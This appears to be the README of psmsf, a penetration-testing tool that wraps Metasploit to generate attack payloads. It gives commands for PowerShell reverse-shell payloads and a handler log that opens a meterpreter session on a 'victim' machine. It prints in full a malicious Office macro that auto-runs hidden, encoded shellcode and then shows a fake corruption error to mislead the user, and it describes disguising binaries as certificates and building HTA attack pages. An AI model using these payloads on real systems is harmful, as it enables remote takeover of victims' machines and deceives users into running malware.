Pentest - psmsf

PSMSF

PSMSF can help us generate payload or files used in cmd console/browser/.. with Metasploit-Framework. If you are similar to windows cmd console, you can use the results in different areas.

psmsf [master●] python psmsf.py -hUsage: python psmsf.py [options]Options:  -h, --help            show this help message and exit  --attacktype=ATTACKTYPE                        Attack Types are supported. (ps, crt, hta, mac)  Powershell/Macro Attack:    Generate metasploit console script / macro    --payload=PAYLOAD   payload of metasploit framework    --lhost=LHOST       lhost for payload of metasploit framework    --lport=LPORT       lport for payload of metasploit framework  CERT Attack:    Translate a binary file into a text certification file, and restore    the cert file to a binary file on target machines    --filename=FILENAME                        file to be encoded to a certification  HTA Attack:    Generate HTA html page. When victims access HTA page, os will be    attacked from Internet Explorer    --command=COMMAND   command of attack mode

Requirement

If you use Kali Linux, Install Metasploit-Framework with the command:

$ sudo apt-get install metasploit-framework

Usage

psmsf has three attack types,

• [x] powershell attack
• [x] cert attack
• [x] hta attack

Powershell Attack Mode

psmsf [master●] python psmsf.py --attacktype ps[+]     ######      #     #  ####  #    #  ####  ######       #     # #      ##  ## #      #        ######   ####  # ## #  ####  #####         #            # #    #      # #          #       #    # #    # #    # #           #        ####  #    #  ####  #[+] Everything is now generated in two files, ex:    powershell_hacking.bat - shellcode can be executed in cmd console.                           - Usage: cmd.exe /c powershell_hacking.bat    powershell_msf.rc      - msfconsole resource script.                           - Usage: msfconsole -r powershell_msf.rc[+] python psmsf.py --attacktype ps --payload windows/shell/reverse_tcp --lhost 192.168.1.100 --lport 8443[+] python psmsf.py --attacktype ps --payload windows/meterpreter/reverse_tcp --lhost 192.168.1.100 --lport 8443[+] python psmsf.py --attacktype ps --payload windows/meterpreter/reverse_http --lhost 192.168.1.100 --lport 8443

Everything is now generated in two files,

psmsf [master●] python psmsf.py --attacktype ps --payload windows/meterpreter/reverse_tcp --lhost 192.168.1.101 --lport 8443[+] create msfconsole resource script[+] create powershell shellcode command

Victim

Please put the file powershell_hacking.bat to the victim’s machine, and execute the shellcode with command.

cmd.exe /c powershell_hacking.bat

Attacker

Starts a metasploit-framework listeners,

psmsf [master●] msfconsole -r powershell_msf.rc# cowsay++ ____________< metasploit > ------------       \   ,__,        \  (oo)____           (__)    )\              ||--|| *       =[ metasploit v4.11.11-dev-95484c8                 ]+ -- --=[ 1521 exploits - 884 auxiliary - 259 post        ]+ -- --=[ 437 payloads - 38 encoders - 8 nops             ]+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ][*] Processing powershell_msf.rc for ERB directives.resource (powershell_msf.rc)> use exploit/multi/handlerresource (powershell_msf.rc)> set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcpresource (powershell_msf.rc)> set LHOST 192.168.1.101LHOST => 192.168.1.101resource (powershell_msf.rc)> set LPORT 8443LPORT => 8443resource (powershell_msf.rc)> set ExitOnSession falseExitOnSession => falseresource (powershell_msf.rc)> set EnableStageEncoding trueEnableStageEncoding => trueresource (powershell_msf.rc)> exploit -j[*] Exploit running as background job.[*] Started reverse TCP handler on 192.168.1.101:8443[*] Starting the payload handler...msf exploit(handler) >

If you run powershell_hacking.bat on victim’s machine, a new session will be created:

msf exploit(handler) > jobsJobs====  Id  Name                    Payload                          LPORT  --  ----                    -------                          -----  0   Exploit: multi/handler  windows/meterpreter/reverse_tcp  8443msf exploit(handler) >[*] Encoded stage with x86/shikata_ga_nai[*] Sending encoded stage (958029 bytes) to 192.168.1.101[*] Meterpreter session 1 opened (192.168.1.101:8443 -> 192.168.1.101:64656) at 2016-02-20 17:46:01 +0800msf exploit(handler) > sessions -i 1[*] Starting interaction with 1...meterpreter > sysinfoComputer        : SECOS              : Windows 7 (Build 7600).

Macro Attack Mode

Create a macro VBA for shellcode executation.

root@lab:/usr/share/psmsf# python psmsf.py --attacktype mac --payload windows/meterpreter/reverse_https --lhost 192.168.1.101 --lport 8443[+] create msfconsole resource script[+] create powershell shellcode command[+]Sub Auto_Open()Dim xx = "powershell -window hidden -enc JAAxACAAPQAgACcAJABjACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAGMAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgBhACwAMAB4ADEAYgAsADAAeAAxADEALAAwAHgAZgA0ACwAMAB4AGYANwAsADAAeABkADkALAAwAHgAYwAxACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGUALAAwAHgAMwAzACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANQA3ACwAMAB4ADMAMQAsADAAeAA1ADYALAAwAHgAMQAzACwAMAB4ADgAMwAsADAAeABlAGUALAAwAHgAZgBjACwAMAB4ADAAMwAsADAAeAA1ADYALAAwAHgAMQA0ACwAMAB4AGYAMwAsADAAeAAwADEALAAwAHgAMABiACwAMAB4AGMAMgAsADAAeAA3ADEALAAwAHgAZQA5ACwAMAB4AGYANAAsADAAeAAxADIALAAwAHgAMQA2ACwAMAB4ADYAMwAsADAAeAAxADEALAAwAHgAMgAzACwAMAB4ADEANgAsADAAeAAxADcALAAwAHgANQAxACwAMAB4ADEAMwAsADAAeABhADYALAAwAHgANQAzACwAMAB4ADMANwAsADAAeAA5AGYALAAwAHgANABkACwAMAB4ADMAMQAsADAAeABhAGMALAAwAHgAMQA0ACwAMAB4ADIAMwAsADAAeAA5AGUALAAwAHgAYwAzACwAMAB4ADkAZAAsADAAeAA4AGUALAAwAHgAZgA4ACwAMAB4AGUAYQAsADAAeAAxAGUALAAwAHgAYQAyACwAMAB4ADMAOQAsADAAeAA2AGMALAAwAHgAOQBjACwAMAB4AGIAOQAsADAAeAA2AGQALAAwAHgANABlACwAMAB4ADkAZAAsADAAeAA3ADEALAAwAHgANgAwACwAMAB4ADgAZgAsADAAeABkAGEALAAwAHgANgBjACwAMAB4ADgAOQAsADAAeABkAGQALAAwAHgAYgAzACwAMAB4AGYAYgAsADAAeAAzAGMALAAwAHgAZgAyACwAMAB4AGIAMAAsADAAeABiADYALAAwAHgAZgBjACwAMAB4ADcAOQAsADAAeAA4AGEALAAwAHgANQA3ACwAMAB4ADgANQAsADAAeAA5AGUALAAwAHgANQBhACwAMAB4ADUAOQAsADAAeABhADQALAAwAHgAMwAwACwAMAB4AGQAMQAsADAAeAAwADAALAAwAHgANgA2ACwAMAB4AGIAMgAsADAAeAAzADYALAAwAHgAMwA5ACwAMAB4ADIAZgAsADAAeABhAGMALAAwAHgANQBiACwAMAB4ADAANAAsADAAeABmADkALAAwAHgANAA3ACwAMAB4AGEAZgAsADAAeABmADIALAAwAHgAZgA4ACwAMAB4ADgAMQAsADAAeABmAGUALAAwAHgAZgBiACwAMAB4ADUANwAsADAAeABlAGMALAAwAHgAYwBmACwAMAB4ADAAOQAsADAAeABhADkALAAwAHgAMgA4ACwAMAB4AGYANwAsADAAeABmADEALAAwAHgAZABjACwAMAB4ADQAMAAsADAAeAAwADQALAAwAHgAOABmACwAMAB4AGUANgAsADAAeAA5ADYALAAwAHgANwA3ACwAMAB4ADQAYgAsADAAeAA2ADIALAAwAHgAMABkACwAMAB4AGQAZgAsADAAeAAxADgALAAwAHgAZAA0ACwAMAB4AGUAOQAsADAAeABkAGUALAAwAHgAYwBkACwAMAB4ADgAMwAsADAAeAA3AGEALAAwAHgAZQBjACwAMAB4AGIAYQAsADAAeABjADAALAAwAHgAMgA1ACwAMAB4AGYAMAAsADAAeAAzAGQALAAwAHgAMAA0ACwAMAB4ADUAZQAsADAAeAAwAGMALAAwAHgAYgA1ACwAMAB4AGEAYgAsADAAeABiADEALAAwAHgAOAA1ACwAMAB4ADgAZAAsADAAeAA4AGYALAAwAHgAMQA1ACwAMAB4AGMAZQAsADAAeAA1ADYALAAwAHgAYgAxACwAMAB4ADAAYwAsADAAeABhAGEALAAwAHgAMwA5ACwAMAB4AGMAZQAsADAAeAA0AGYALAAwAHgAMQA1ACwAMAB4AGUANQAsADAAeAA2AGEALAAwAHgAMQBiACwAMAB4AGIAYgAsADAAeABmADIALAAwAHgAMAA2ACwAMAB4ADQANgAsADAAeABkADMALAAwAHgANgBhACwAMAB4ADcAYwAsADAAeAAwAGQALAAwAHgAMgAzACwAMAB4ADEAYgAsADAAeAAwADkALAAwAHgAOAA0ACwAMAB4ADQAZAAsADAAeABiADIALAAwAHgAYQAxACwAMAB4ADMAZQAsADAAeABkAGQALAAwAHgAMwAzACwAMAB4ADYAYwAsADAAeABiADgALAAwAHgAMgAyACwAMAB4ADYAZQAsADAAeAA0ADEALAAwAHgAMQBkACwAMAB4ADgAZgAsADAAeABjADIALAAwAHgAZgAxACwAMAB4AGYAMgAsADAAeAA3AGMALAAwAHgAOABkACwAMAB4AGMAZgAsADAAeABhADIALAAwAHgAZgBiACwAMAB4AGUAYQAsADAAeABjAGYALAAwAHgAOQBlACwAMAB4AGEAOAAsADAAeABhADcALAAwAHgANAA1ACwAMAB4ADIAMgAsADAAeAAxAGQALAAwAHgAMQBiACwAMAB4AGYAMgAsADAAeABkAGYALAAwAHgAOAAxACwAMAB4ADkAYgAsADAAeAAwADIALAAwAHgAYwA4ACwAMAB4ADQAZAAsADAAeAA5AGIALAAwAHgAMAAyACwAMAB4ADAAOAAsADAAeAA2ADIALAAwAHgAYQBlACwAMAB4ADQAMAAsADAAeAAzAGIALAAwAHgAMQAzACwAMAB4ADgAOAAsADAAeAA0ADQALAAwAHgANgBiACwAMAB4ADgAMwAsADAAeAA0ADMALAAwAHgAYwBjACwAMAB4ADEANAAsADAAeAA5ADUALAAwAHgAOQAzACwAMAB4ADEAYgAsADAAeABhADMALAAwAHgAZABmACwAMAB4ADMAZgAsADAAeABjAGMALAAwAHgAYgA0ACwAMAB4AGUAZAAsADAAeAA1AGYALAAwAHgAOAA4ACwAMAB4AGUANgAsADAAeAA0ADIALAAwAHgAZgAzACwAMAB4AGMANgAsADAAeAA1AGIALAAwAHgAMwAyACwAMAB4ADkAYgAsADAAeAAwADMALAAwAHgAMABlACwAMAB4ADkANAAsADAAeAA2ADAALAAwAHgAMgBiACwAMAB4ADYANAAsADAAeAA3AGUALAAwAHgAZgBjACwAMAB4AGQAOQAsADAAeABkADgALAAwAHgAMQA2ACwAMAB4ADgAMQAsADAAeABlAGQALAAwAHgAZQA2ACwAMAB4AGUANgAsADAAeAAwADgALAAwAHgAZgAxACwAMAB4ADgAZAAsADAAeABlADIALAAwAHgANQBhACwAMAB4ADkAOAAsADAAeAA0AGUALAAwAHgAYgBjACwAMAB4ADMAMgAsADAAeAAyADkALAAwAHgAMwA3ACwAMAB4AGQAZQAsADAAeAA0ADUALAAwAHgAMgBlACwAMAB4ADYAMgAsADAAeAA4AGQALAAwAHgAMQBhACwAMAB4ADgAMgAsADAAeABkAGUALAAwAHgANgA3ACwAMAB4AGYANQAsADAAeAAwADkALAAwAHgAZQA3ACwAMAB4ADkAZgAsADAAeAA3AGUALAAwAHgAYQBkACwAMAB4ADMAMgAsADAAeAAxAGEALAAwAHgANAAwACwAMAB4ADIANAAsADAAeABiADcALAAwAHgANgBiACwAMAB4ADMANAAsADAAeAAxAGUALAAwAHgAYQBmACwAMAB4ADgAMwAsADAAeAAwADMALAAwAHgAMAAyACwAMAB4ADYANgAsADAAeAA5AGMALAAwAHgAYgA5ACwAMAB4ADIAOQAsADAAeABjADcALAAwAHgAMABhACwAMAB4ADQAMgAsADAAeABiAGUALAAwAHgAYwA3ACwAMAB4AGMAYQAsADAAeAAyAGEALAAwAHgAYgBlACwAMAB4AGMANwAsADAAeAA4AGEALAAwAHgAYQBhACwAMAB4AGUAZAAsADAAeABhAGYALAAwAHgANQAyACwAMAB4ADAAZgAsADAAeAA0ADIALAAwAHgAZAA1ACwAMAB4ADkAZAAsADAAeAA5AGEALAAwAHgAZgA2ACwAMAB4ADQANgAsADAAeAAzADIALAAwAHgAYQBjACwAMAB4ADEAZQAsADAAeAAzAGYALAAwAHgAZABjACwAMAB4AGEAZQAsADAAeABjADAALAAwAHgAYwAwACwAMAB4ADEAYwAsADAAeABmAGMALAAwAHgANQA2ACwAMAB4AGEAOQAsADAAeAAwAGUALAAwAHgAOQA0ACwAMAB4AGQAZQAsADAAeABjAGIALAAwAHgAZAAxACwAMAB4ADQAZAAsADAAeAA2ADUALAAwAHgAYwBiACwAMAB4ADUAOQAsADAAeABhADMALAAwAHgAZQBkACwAMAB4AGMAYgAsADAAeABhADAALAAwAHgAZgA4ACwAMAB4ADcANwAsADAAeAAxADMALAAwAHgAZAA3ACwAMAB4ADEAYgAsADAAeAAyAGYALAAwAHgANQA3ACwAMAB4ADQAOAAsADAAeAAwAGMALAAwAHgAYQA1ACwAMAB4AGEAOAAsADAAeAA4ADkALAAwAHgAMwAzACwAMAB4ADcANwAsADAAeAA2AGUALAAwAHgANAA3ACwAMAB4AGUAMgAsADAAeAA0ADkALAAwAHgAYQA2ACwAMAB4ADkAZgAsADAAeABkADQALAAwAHgAOQA4ACwAMAB4AGUAOAAsADAAeABlAGUALAAwAHgAMQA4ACwAMAB4AGUAYQAsADAAeABmADQAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAHgAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAHgALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAHgALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJAAxACkAKQA7ACQAMgAgAD0AIAAiAC0AZQBuAGMAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkADMAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAMwAgACQAMgAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJAAyACAAJABlACIAOwB9AA=="Shell ("POWERSHELL.EXE " & x)Dim title As Stringtitle = "Critical Microsoft Office Error"Dim msg As StringDim intResponse As Integermsg = "This document appears to be corrupt or missing critical rows in order to restore. Please restore this file from a backup."intResponse = MsgBox(msg, 16, title)Application.QuitEnd Sub

Cert Attack Mode

You can translate a binary file to a certificate file which is a text file.

psmsf [master●] python psmsf.py --attacktype crt --filename demo.exepsmsf [master●] ll cert_attacktotal 48-rw-r--r--  1 Open-Security  staff    44B Feb 20 21:31 cert_decode.bat-rw-r--r--  1 Open-Security  staff    17K Feb 20 21:31 cert_encode.crt

Upload cert_encode.crt to victim machine, and restore it with windows batch script - cert_decode.bat.

HTA Attack Mode

Create windows hta web page, and you can access http://demo.com/index.html with Internet Explorer Browser.

psmsf [master●] python psmsf.py --attacktype hta --command whoami               [+] create hta index file[+] create hta module filepsmsf [master●] ll windows_hta_attacktotal 16-rw-r--r--  1 Open-Security  staff   151B Feb 20 21:37 index.html-rw-r--r--  1 Open-Security  staff   122B Feb 20 21:37 module.hta

References

https://github.com/trustedsec/unicorn

License: BSD License